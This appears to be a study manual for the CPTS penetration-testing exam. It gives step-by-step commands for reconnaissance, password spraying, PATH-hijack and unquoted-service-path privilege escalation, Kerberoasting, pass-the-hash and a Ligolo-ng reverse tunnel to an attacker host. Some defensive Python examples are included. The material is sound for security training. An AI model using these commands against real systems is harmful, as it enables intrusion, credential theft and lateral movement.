The Encyclopedia of CPTS: Advanced Enterprise Architecture and Exploitation Manual

Section 1: Architectural Foundations and the Interconnected Network Chain
Modern corporate network environments do not rely on single systems. They use interconnected, multi-tiered architectures in which directory services, database backends, application servers, and network storage solutions communicate constantly. The Certified Penetration Testing Specialist (CPTS) evaluation simulates this environment. It does not test isolated vulnerabilities. It requires you to discover, analyze, and exploit a complex web of architectural relationships.
An operator must view the target network as an interdependent graph. A minor flaw on an external-facing system, such as an unauthenticated file share or an information disclosure vulnerability in a web application, provides the initial data points needed to compromise a low-privilege system user. From that initial foothold, you must extract local configuration files, analyze system memory, and map active network paths to escalate privileges or move laterally.
THE PROPAGATION CYCLE

[Phase 1: External Reconnaissance]
        │
        ▼
[Phase 2: Initial Access & Foothold] ──> (Harvest Local Accounts/Hashes)
        │
        ▼
[Phase 3: Local Privilege Escalation]
        │
        ▼
[Phase 4: Network Pivot Setup]
        │
        ▼
[Phase 5: Internal Network Discovery]
        │
        ▼
[Phase 6: Active Directory Domination] ──> (Domain Wide Control)
Every compromised asset serves as an informational platform. You must query its active connections, review its configuration history, and use its trusted network position to pivot into segmented zones that are completely inaccessible from the outside.
—
Section 2: Exhaustive Reconnaissance and Infrastructure Fingerprinting
Rushed network discovery leads directly to missed attack paths. High-value enterprise systems are frequently hidden behind non-standard port configurations, restrictive firewall policies, and intrusion detection appliances designed to disrupt automated tools.
Asynchronous Network Discovery Protocol
To ensure full coverage across large address spaces without missing hidden services or dropping connections due to network congestion, split your network mapping into three distinct phases.
The first phase uses asynchronous SYN scanning to sweep all 65,535 TCP ports at an elevated rate. It identifies live ports immediately, and the -Pn flag skips host discovery so that hosts which drop ICMP probes are still scanned.
nmap -sS -Pn -p- --min-rate 10000 --max-retries 2 -oA nmap_all_ports_raw 10.129.20.0/24
The second phase extracts the exact open ports from the phase-one output files and conducts deep service fingerprinting, banner analysis, and default NSE script checks (-sC) against those ports only.
nmap -sC -sV -p21,22,80,135,443,445,1433,3389,5985,8080,8443 -Pn -oA nmap_deep_services 10.129.20.0/24
The third phase targets critical infrastructure UDP services. These ports often handle background management data, such as domain name resolution, network time synchronization, or configuration backups.
nmap -sU --top-ports 250 --min-rate 2000 --max-retries 1 -Pn -oA nmap_udp_services 10.129.20.0/24
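The hand-off from phase one to phase two is a parsing step the manual describes but does not show. The following is an added example (not the manual's own tooling) that reads the .gnmap file written by -oA and builds the phase-two port argument from it; the sample scan output is constructed for the example.

```python
# Added example (not from the manual): turn the phase-1 .gnmap file into the
# exact port list that the phase-2 service-fingerprinting run should target.
import re
from typing import Dict, List

# Constructed sample of nmap grepable output (the .gnmap file written by -oA);
# not a real scan result.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sS -Pn -p- --min-rate 10000 -oA nmap_all_ports_raw 10.129.20.0/24
Host: 10.129.20.10 ()\tStatus: Up
Host: 10.129.20.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 445/open/tcp//microsoft-ds///\tIgnored State: filtered (65532)
Host: 10.129.20.20 ()\tPorts: 88/open/tcp//kerberos-sec///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 5985/open/tcp//wsman///
Host: 10.129.20.30 ()\tPorts: 8080/open|filtered/tcp//http-proxy///
# Nmap done -- 256 IP addresses (3 hosts up) scanned
"""

# Only confirmed-open TCP ports; "open|filtered" is deliberately excluded.
PORT_RE = re.compile(r"(\d+)/open/tcp/")


def open_ports_by_host(gnmap_text: str) -> Dict[str, List[int]]:
    """Map each host to its sorted list of confirmed-open TCP ports."""
    result: Dict[str, set] = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab (e.g. before "Ignored State").
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        ports = {int(m.group(1)) for m in PORT_RE.finditer(ports_field)}
        if ports:
            result.setdefault(host, set()).update(ports)
    return {h: sorted(p) for h, p in result.items()}


def phase2_port_arg(by_host: Dict[str, List[int]]) -> str:
    """Union of all open ports as a comma-separated string for nmap -p."""
    union = sorted({p for ports in by_host.values() for p in ports})
    return ",".join(str(p) for p in union)


def phase2_command(gnmap_text: str, target: str, prefix: str = "nmap_deep_services") -> str:
    """Assemble the phase-2 command from phase-1 results (hosts with no open ports are skipped)."""
    by_host = open_ports_by_host(gnmap_text)
    return f"nmap -sC -sV -p{phase2_port_arg(by_host)} -Pn -oA {prefix} {target}"
```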
Service Specific Enumeration Mechanics
Web Applications and Virtual Host Resolution
Enterprise web infrastructure often routes traffic to multiple isolated internal applications using a single IP address by filtering incoming requests based on the HTTP Host header. If an IP address displays a default web server landing page during initial scanning, you must fuzz for alternative virtual hosts to uncover staging platforms or hidden development portals.
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1mil-5000.txt -u http://10.129.20.10/ -H "Host: FUZZ.target.local" -fs 15152
Once a valid virtual host is confirmed, directory and file extension fuzzing must be tailored to the underlying web technology stack. Enforce recursive discovery down to two layers deep to capture hidden files, backups, and old configuration endpoints.
ffuf -w /usr/share/wordlists/dirb/big.txt -u http://app.target.local/FUZZ -e .php,.txt,.xml,.json,.config,.bak,.old -recursion -recursion-depth 2 -v -o web_fuzz_results.json
Server Message Block (SMB) Structural Analysis
Server Message Block endpoints are primary targets due to overly permissive access control entries applied to network file storage. You must check the entire target block for null sessions or default guest access permissions across all discovered file systems.
netexec smb 10.129.20.0/24 -u '' -p '' --shares
netexec smb 10.129.20.0/24 -u 'guest' -p '' --shares
When an accessible share is identified, dump its file structure recursively to a local text file rather than browsing folders manually. This allows you to run precise regular expression queries to locate passwords, database strings, or backup archives.
smbclient //10.129.20.10/Data -N -c 'recurse ON; prompt OFF; dir' > smb_files.txt
grep -Ei 'pass|user|cred|conf|db|backup|key|token|secret' smb_files.txt
Lightweight Directory Access Protocol (LDAP) Interrogation
If an Active Directory domain controller permits anonymous binding, you can pull the schema of the entire domain before establishing a shell on any system. First, execute a base query to resolve the exact domain distinguished name layout.
ldapsearch -x -H ldap://10.129.20.20 -s base namingContexts
Use the recovered base parameters to map out all active domain users, system descriptions, and group mappings, outputting the text directly for local parsing.
ldapsearch -x -H ldap://10.129.20.20 -b "DC=target,DC=local" "(objectClass=user)" sAMAccountName description memberOf > ldap_users.txt
—
Section 3: Active Directory User Spraying and Validation Protocols
Once domain user lists are compiled from your enumeration data, you can begin password validation operations. The CPTS exam requires precise execution to avoid locking user accounts and triggering defensive alerts.
[Analyze Domain User List]
            │
            ▼
[Query Active Password Policy]
(Check BadPwdCount and Lockout)
            │
            ▼
[Enforce Safe Spray Interval]
(1 Guess Per Account Per Cycle)
            │
            ▼
┌───────────────────────────────┐
│ Verify Remote Service Access  │
└──────────────┬────────────────┘
               │
       ┌───────┴───────┐
       ▼               ▼
   [ WinRM ]       [ MSSQL ]
(Instant Shell) (Database Admin)
Password Spraying Protocol
Before sending a password guess to a domain controller, you must identify the account lockout threshold policy. If a policy locks accounts after five failed attempts, you must limit your automated sprays to a single attempt within that lockout window.
netexec smb 10.129.20.20 -u 'anonymous' -p '' --pass-pol
Once the safety boundaries are established, spray a highly targeted corporate formatted password across your clean user list.
netexec smb 10.129.20.20 -u users.txt -p 'Spring2026!' --continue-on-success
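The one-guess-per-account-per-cycle pattern described above has a distinctive footprint in domain controller logon telemetry, which is what a blue team keys on. This added example (not part of the manual) runs a spray detector over a constructed, condensed CSV rendering of Windows Security 4625 events and separates the spray profile from single-account brute force.

```python
# Added example (not from the manual): flag the spray profile described above
# (one guess per account per cycle, many accounts) in failed-logon telemetry,
# and distinguish it from single-account brute force.
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample: condensed Windows Security 4625 events as CSV rows of
# timestamp, source IP, target account, NTSTATUS (0xC000006A = bad password).
SAMPLE_EVENTS = """\
2026-03-02T09:00:01,10.129.20.77,asmith,0xC000006A
2026-03-02T09:00:02,10.129.20.77,bsmith,0xC000006A
2026-03-02T09:00:03,10.129.20.77,cjones,0xC000006A
2026-03-02T09:00:04,10.129.20.77,dlee,0xC000006A
2026-03-02T09:00:05,10.129.20.77,efox,0xC000006A
2026-03-02T09:00:06,10.129.20.77,gwang,0xC000006A
2026-03-02T09:05:00,10.129.20.88,admin,0xC000006A
2026-03-02T09:05:01,10.129.20.88,admin,0xC000006A
2026-03-02T09:05:02,10.129.20.88,admin,0xC000006A
2026-03-02T09:05:03,10.129.20.88,admin,0xC000006A
2026-03-02T09:05:04,10.129.20.88,admin,0xC000006A
2026-03-02T09:05:05,10.129.20.88,admin,0xC000006A
2026-03-02T10:30:00,10.129.20.99,hgreen,0xC000006A
"""

Event = Tuple[datetime, str, str, str]


def parse_events(text: str) -> List[Event]:
    rows: List[Event] = []
    for line in text.splitlines():
        ts, src, user, status = line.split(",")
        rows.append((datetime.fromisoformat(ts), src, user, status))
    return rows


def detect_spray(events: List[Event], window: timedelta = timedelta(minutes=30),
                 min_accounts: int = 5, max_per_account: int = 2) -> Dict[str, List[str]]:
    """Return {source_ip: [targeted accounts]} for each source whose bad-password
    failures inside one window hit many distinct accounts with few attempts each.
    A source hammering a single account is brute force, not a spray, and is not returned."""
    by_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, src, user, status in events:
        if status == "0xC000006A":
            by_src[src].append((ts, user))
    hits: Dict[str, List[str]] = {}
    for src, rows in by_src.items():
        rows.sort()
        for i, (start, _) in enumerate(rows):  # slide the window over each start point
            counts: Dict[str, int] = defaultdict(int)
            for ts, user in rows[i:]:
                if ts - start <= window:
                    counts[user] += 1
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                hits[src] = sorted(counts)
                break
    return hits
```

Only the source that touched six different accounts once each is reported; the source with six failures against admin is a brute-force pattern and is left for a separate threshold rule.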
Remote Service Access Verification
When a successful authentication match is flagged, verify where that user has remote management capabilities across the network segment.
netexec winrm 10.129.20.0/24 -u 'bsmith' -p 'Spring2026!'
netexec mssql 10.129.20.0/24 -u 'bsmith' -p 'Spring2026!'
netexec ssh 10.129.20.0/24 -u 'bsmith' -p 'Spring2026!'
—
Section 4: Post Exploitation and Local Privilege Escalation
Landing a basic user terminal shell is an intermediate step. You must immediately shift focus to dissecting the underlying operating system environment to elevate your execution context to an administrative level.
Linux Local Privilege Escalation Engineering
When inspecting a Linux shell, check the environment configuration files, kernel runtime flags, and custom automation scripts.
Path Manipulation and SUID Traversal
Look for binaries that carry the SUID bit, which makes them execute with the effective privileges of the file owner (frequently root) regardless of who launches them.
find / -perm -4000 -type f 2>/dev/null
If a custom application binary is discovered, run strings on it to check whether it calls standard system utilities such as cat, echo, or chmod by bare name rather than by absolute filesystem path.
strings /opt/custom_backup
If it references cat instead of /bin/cat, the binary resolves the command through the caller's PATH. You can prepend a writable directory such as /tmp to your PATH variable, place a script named cat inside that directory, and run the SUID binary so that your script executes with root privileges.
echo "/bin/bash" > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
Internal Network Listener Mapping
Many administration panels, databases, or local services are bound strictly to the local loopback adapter, making them invisible during external port scans. Always inspect active sockets directly from the shell.
ss -lntp
Windows Local Privilege Escalation Engineering
Elevating privileges on Windows systems requires assessing access token privileges, registry stores, and unquoted service path configuration flaws.
Token Privileges Analysis
Analyze the privileges assigned to the access token of your current process.
whoami /priv
If the output shows SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, the configuration is vulnerable to token impersonation. Tools such as PrintSpoofer or GodPotato coerce a local SYSTEM service into connecting to a named pipe under your control, allowing you to impersonate the resulting token and run as NT AUTHORITY\SYSTEM.
Unquoted Service Interception
Search for auto-start services whose executable path contains spaces and is not enclosed in quotation marks.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
If a service resolves to the unquoted path C:\Program Files\Staging Tools\Runner Engine\service.exe, the service control manager tries each space-delimited prefix in turn (C:\Program.exe, then C:\Program Files\Staging.exe, and so on) before reaching the intended executable. You can intercept the execution chain by dropping a malicious executable named Staging.exe directly into C:\Program Files, which will run the next time the system or service initiates.
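The prefix-by-prefix lookup described above is also exactly what an audit script checks for. This added example (not from the manual) mirrors the wmic pipeline's filters (auto-start, outside C:\Windows, unquoted) over constructed service records, lists the prefixes the service control manager would try, and emits the quoted ImagePath value that remediates each finding.

```python
# Added example (not from the manual): audit service image paths for the
# unquoted-path flaw, list the prefixes the service control manager tries
# before the real executable, and produce the quoted path that fixes it.
from typing import Dict, List

# Constructed sample records mirroring the wmic fields queried above.
SAMPLE_SERVICES = [
    {"name": "StagingRunner", "startmode": "Auto",
     "pathname": r"C:\Program Files\Staging Tools\Runner Engine\service.exe"},
    {"name": "VendorAgent", "startmode": "Auto",
     "pathname": r'"C:\Program Files\Vendor\agent.exe" -service'},
    {"name": "Spooler", "startmode": "Auto",
     "pathname": r"C:\Windows\System32\spoolsv.exe"},
    {"name": "Updater", "startmode": "Manual",
     "pathname": r"C:\Program Files\Acme Updater\upd.exe"},
    {"name": "NoSpaces", "startmode": "Auto",
     "pathname": r"C:\Tools\svc.exe -k"},
]


def executable_part(pathname: str) -> str:
    """Strip trailing arguments: everything after the first '.exe' is dropped."""
    idx = pathname.lower().find(".exe")
    return pathname if idx == -1 else pathname[: idx + 4]


def is_unquoted_vulnerable(pathname: str) -> bool:
    """True when the path is unquoted, contains a space in the executable part,
    and lives outside C:\\Windows (mirrors the findstr filters in the manual)."""
    p = pathname.strip()
    if p.startswith('"') or p.lower().startswith("c:\\windows\\"):
        return False
    return " " in executable_part(p)


def candidate_paths(pathname: str) -> List[str]:
    """Prefixes the SCM resolves in order: each cut at a space, with .exe appended,
    and finally the intended executable itself."""
    exe = executable_part(pathname)
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]


def quoted_fix(pathname: str) -> str:
    """Remediation value for the service ImagePath: quote the executable, keep arguments."""
    exe = executable_part(pathname)
    return f'"{exe}"' + pathname[len(exe):]


def audit(services: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Auto-start services with an unquoted spaced path, mapped to their lookup candidates."""
    return {s["name"]: candidate_paths(s["pathname"]) for s in services
            if s["startmode"].lower() == "auto" and is_unquoted_vulnerable(s["pathname"])}
```

Manual-start services are filtered out only to match the wmic pipeline above; in a real hardening pass they should be quoted as well.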
—
Section 5: Active Directory Infrastructure Domination
Enterprise Active Directory networks rely on Kerberos tickets, object access control lists (ACLs), and complex group inheritance rules.
Active Directory Attack Matrix
| Attack Vector | Underlying Cause | Tactical Execution Tool |
|---|---|---|
| AS-REP Roasting | Accounts missing Kerberos pre-authentication requirements. | impacket-GetNPUsers |
| Kerberoasting | High privilege service accounts map to active SPNs. | impacket-GetUserSPNs |
| Pass-the-Hash | NTLM authentication allowed across network endpoints. | impacket-wmiexec |
| ACL Abuse | Over permissive descriptors like GenericAll or WriteDacl. | PowerView / BloodHound |
Direct Domain Exploitation Syntax
AS-REP Roasting Operations
If a domain user account does not require Kerberos pre-authentication, any unauthenticated client that can reach the domain controller can request an AS-REP for that account and receive material encrypted with the account's password-derived key, which can be cracked entirely offline.
impacket-GetNPUsers target.local/ -no-pass -usersfile users.txt -format hashcat -outputfile asrep.hashes
Kerberoasting Operations
Service Principal Names link domain service accounts to explicit service systems. You can request a Ticket Granting Service ticket for these accounts using any valid low privilege domain credentials, then pull down the crackable material.
impacket-GetUserSPNs target.local/lowuser:Password123 -request -outputfile kerberoast.hashes
Pass the Hash Authentication
Active Directory environments often allow users to authenticate with their raw NTLM hash directly, removing the need to crack or otherwise recover the underlying plaintext password. Impacket expects the hash as LMHASH:NTHASH; the LM half below is the well-known empty-LM value.
impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:5846786a3434376b3261623334563461 Administrator@10.129.20.10
BloodHound Structural Analysis
When processing an Active Directory domain map inside BloodHound, focus on relationship edges.
If a path reveals a GenericAll relationship from a group you control to a target user object, you can directly modify that target account properties or reset its password.
If a path reveals a WriteDacl edge, you can alter the security descriptor of the object to grant your current account full control permissions (GenericAll), allowing you to execute further escalation actions.
—
Section 6: Network Pivoting and Layer 3 Tunneling Mechanics
Internal network segmentation blocks direct traffic from your primary attack platform to back end systems. Pivoting configures compromised hosts to act as network routers.
Layer 3 Tunneling via Ligolo-ng
Ligolo-ng is a high performance tunneling tool that sets up a dedicated TUN interface on your attack machine. This allows you to route raw network traffic directly into isolated subnets without SOCKS wrappers such as ProxyChains.
[ Attacking Machine ]          [ Pivot Host ]           [ Internal Subnet ]
    (10.10.14.50)              (Dual-Homed)            (Internal IP Range)
         │                           │                          │
         │── [Launch Proxy Server] ──┤                          │
         │   (Listening on 11601)    │                          │
         │                           │── [Run Agent Binary] ────┤
         │<─ [Reverse Tunnel] ───────┤ (Connects back to Proxy) │
         │                           │                          │
 [Create TUN Interface]              │                          │
 [Add Route to 172.16.5.0/24]        │                          │
         │                           │                          │
         │══════ [ Route Raw Traffic Through Tunnel ] ═════════>│
Pivot Configuration Process: the four-step command sequence (interface and proxy setup, agent launch, routing, internal scanning) is listed at the end of this manual, after Section 8.
—
Section 7: Commercial Grade Vulnerability Reporting
The final deliverable of a professional engagement is the penetration testing report. Technical success must be documented with absolute clarity to provide commercial value.
Finding Entry Schema Example
Vulnerability Name: Insecure Storage of Active Directory Domain Credentials
Vulnerability Classification: Information Disclosure / Broken Access Control
Vulnerability Severity: High Risk
CVSS v3.1 Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Detailed Description
The internal file storage appliance located at 10.129.20.5 hosts a Server Message Block share named Development that permits unauthenticated read capabilities to any network session. A recursive investigation of this file structure revealed a cleartext database connection string containing valid domain service credentials stored inside a production environment configuration file.
Step by Step Proof of Concept
First, connect to the exposed network share using an anonymous login session to verify open access.
smbclient //10.129.20.5/Development -N
Navigate into the staging directory tree and download the active application configuration file directly to your local filesystem.
get config.json
Read the text contents of the configuration file to extract the cleartext authentication parameters.
{
"db_host": "172.16.5.30",
"db_user": "svc_sql_admin",
"db_pass": "P@ssword!2026"
}
Comprehensive Remediation Steps
First, update the access control lists on the Development file share to require explicit authentication, completely disabling anonymous and guest read privileges.
Second, remove all plain text passwords, cryptographic keys, and hardcoded connection variables from production configuration files and source code repositories.
Third, migrate all sensitive enterprise operational credentials into a centralized, encrypted secrets management vault such as Windows Credential Manager or HashiCorp Vault.
—
Section 8: Mental Management and Operational Safety Boundaries
The CPTS exam network requires significant mental endurance. Tunnel vision is the primary reason otherwise talented engineers fail.
If you spend more than two consecutive hours executing a single exploit against a specific port without gaining new information or an access shell, force yourself to close that terminal tab.
Revert to your primary documentation notes, inspect alternative ports on different hosts, and review your compiled credential lists to find missed opportunities for lateral movement. Document every action cleanly as it occurs to maintain complete control over the engagement structure.
—
Pivot Configuration Process (Section 6 step sequence)
Step 1: Initialize the Interface and Proxy Server (executed on the attack Linux machine)
Create a local virtual tunnel interface, bring it up, and start the Ligolo-ng proxy listener:
sudo ip tuntap add dev ligolo mode tun
sudo ip link set dev ligolo up
./ligolo-proxy -selfcert -laddr 0.0.0.0:11601
The -selfcert flag makes the proxy generate a self-signed certificate for the listener; it pairs with the agent's -ignore-cert flag in Step 2.
Step 2: Launch the Agent Payload (executed on the compromised Windows target)
Transfer the lightweight agent binary onto your initial foothold and execute a reverse connection back to your attacking server:
agent.exe -connect 10.10.14.50:11601 -ignore-cert
Step 3: Configure System Routing Tables (executed on the attack Linux machine)
Once the agent session registers in the proxy console, select it, start the tunnel, and map the newly discovered target subnet into your attack host's routing table.
Inside the Ligolo-ng proxy console:
session
(select the agent session from the list, for example 1)
start
In a separate system terminal, route traffic to the internal subnet through the new interface:
sudo ip route add 172.16.5.0/24 dev ligolo
Step 4: Launch Direct Internal Attacks (executed on the attack Linux machine)
You can now run standard scanning and exploitation tools directly against internal assets without any proxy chains:
nmap -sS -Pn -p 445,3389,5985 172.16.5.15